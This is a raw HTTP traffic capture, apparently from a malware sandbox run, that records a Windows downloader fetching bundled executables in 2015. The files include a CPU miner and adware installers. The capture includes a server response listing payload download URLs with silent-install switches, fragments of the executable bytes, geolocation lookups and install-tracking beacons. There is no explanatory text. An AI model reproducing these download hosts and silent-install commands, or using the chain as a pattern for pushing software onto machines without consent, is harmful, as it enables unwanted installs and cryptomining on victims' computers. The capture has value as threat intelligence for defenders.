GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010082-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:07 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1441580347.25067; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"}]}},"freeze":3600,"refresh":3600,"version":116228}..0..
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 40746
Connection: keep-alive
Date: Fri, 04 Sep 2015 14:41:56 GMT
Last-Modified: Fri, 04 Sep 2015 14:37:33 GMT
ETag: "ceea099a2589b086940ea7e1333a3ad9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 29741
X-Cache: Hit from cloudfront
Via: 1.1 ad1289c08e15a848e5c2bc019529785a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tF56RzIgl9xhI8GZcDd2KDE0wbzLyMVAJTqQ_Y8OEveTk9VLE7MMZw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:08 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=DD2FA126FAC74D8AA1D05FEAF566A195; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=DD2FA126FAC74D8AA1D05FEAF566A195,1441580348.92802; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:38 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441293292"
Last-Modified: Thu, 03 Sep 2015 15:14:52 GMT
Cache-Control: max-age=211
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1441580319.dop007.am4.t,1441580318.cds064.am4.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@.......................................@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"5515\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"5516\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:41 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Sun, 06 Sep 2015 22:58:41 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:43 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40536
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop018.am4.t,1441580323.cds043.am4.c
.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.
<<< skipped >>>
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Sun, 06 Sep 2015 22:58:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
3d3..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..https://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /idn /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..http://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Sun, 06 Sep 2015 22:58:37 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..3d3..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe.. /installapp..hXXps://s3.amazonaws.com/cf_vop
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Sun, 06 Sep 2015 22:58:38 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=VISWHQk.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=2838 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:41 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1441580322.dop017.am4.t,1441580321.cds063.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sun, 06 Sep 2015 22:58:41 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1441580322.dop017.am4.t,1441580321.cds063.am4.c..GIF89a.............,...........D..;..
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:51 GMT
Server: Apache/2.2.16
Last-Modified: Sun, 06 Sep 2015 15:31:47 GMT
ETag: "4da020c-587fe8-51f15d4b59ec0"
Accept-Ranges: bytes
Content-Length: 5799912
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................*....................@..........................0........X..........@..............................P....................sX.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /installers/bi_downloader/1441577004706/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sub.spirlymo.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 430296
Connection: keep-alive
Server: nginx
Date: Sun, 06 Sep 2015 22:03:50 GMT
Last-Modified: Sun, 06 Sep 2015 22:03:26 GMT
ETag: "55ecb82e-690d8"
Expires: Sun, 06 Sep 2015 22:13:50 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 103
X-Cache: Hit from cloudfront
Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GoOd6GvsWR6NrFud1AQQClsWl1vphn6Nc-zOIzB4_jw_YK1Jq-Zi6w==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s..........pD..........X................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...pD.......F...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /CPUminer/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:50 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439472602"
Last-Modified: Thu, 13 Aug 2015 13:30:02 GMT
Cache-Control: max-age=77077
Content-Length: 100529
Content-Type: application/octet-stream
X-HW: 1441580330.dop008.fr7.t,1441580330.cds039.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`..8............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...8....`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6423 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: yAnqCYumV2NHupJk8ImF VZ1AFmRJGxJrOICcP3OSwinz1SRRUIgnns0M 7Izsp
x-amz-request-id: C0D7DE4D39B4F8E6
Date: Sun, 06 Sep 2015 22:58:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9431 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: XrgF/m9KHMNmyqCJuhjzB3kwtEr0gSYQz2veX0Kzzlorl5XxHQA2PItrs9ILnaaa
x-amz-request-id: AB86F51F954E5102
Date: Sun, 06 Sep 2015 22:58:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6862 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: u2johjF6889Rjw23ttIuWqXtOX1O/Y1jK2CgF6dwjlsaNxX41ZN2Hk24uayr5M/r
x-amz-request-id: 3CFC1E57BB33CF5C
Date: Sun, 06 Sep 2015 22:58:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: u2johjF6889Rjw23ttIuWqXtOX1O/Y1jK2CgF6dwjlsaNxX41ZN2Hk24uayr5M/r..x-amz-request-id: 3CFC1E57BB33CF5C..Date: Sun, 06 Sep 2015 22:58:44 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=933 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: yHyhRnYS2MCGujz1F hdSUFiciK/QQl7vBDxi10SceIKYmNvJzsmX6sNawTB9cML
x-amz-request-id: B7C75AB49B620942
Date: Sun, 06 Sep 2015 22:58:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: yHyhRnYS2MCGujz1F hdSUFiciK/QQl7vBDxi10SceIKYmNvJzsmX6sNawTB9cML..x-amz-request-id: B7C75AB49B620942..Date: Sun, 06 Sep 2015 22:58:51 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5132 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: szbKIMajNLrJQXm5yxldzCXQ84eIdh6TMfOfEdjLaVKPohXER2JVmiTcEXEslTfH
x-amz-request-id: 1F3CD514527FB00A
Date: Sun, 06 Sep 2015 22:58:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: szbKIMajNLrJQXm5yxldzCXQ84eIdh6TMfOfEdjLaVKPohXER2JVmiTcEXEslTfH..x-amz-request-id: 1F3CD514527FB00A..Date: Sun, 06 Sep 2015 22:58:54 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6473 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: jtkw/8 MMQQsb5EafOq/AleDoUPll2BbzfXrRshVdb/y9kFYV9vmmdrkAzD1u1tQ
x-amz-request-id: 73C1FCF601D17D8A
Date: Sun, 06 Sep 2015 22:59:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: jtkw/8 MMQQsb5EafOq/AleDoUPll2BbzfXrRshVdb/y9kFYV9vmmdrkAzD1u1tQ..x-amz-request-id: 73C1FCF601D17D8A..Date: Sun, 06 Sep 2015 22:59:11 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=1898 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 0mLafLqiFoE7lAnjOckFkBiq3oFHOUGuU/UPAdPviX08ujUZ0Q/PLFfUVmFGLYRe
x-amz-request-id: 7E7AA2A235A254B9
Date: Sun, 06 Sep 2015 22:59:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
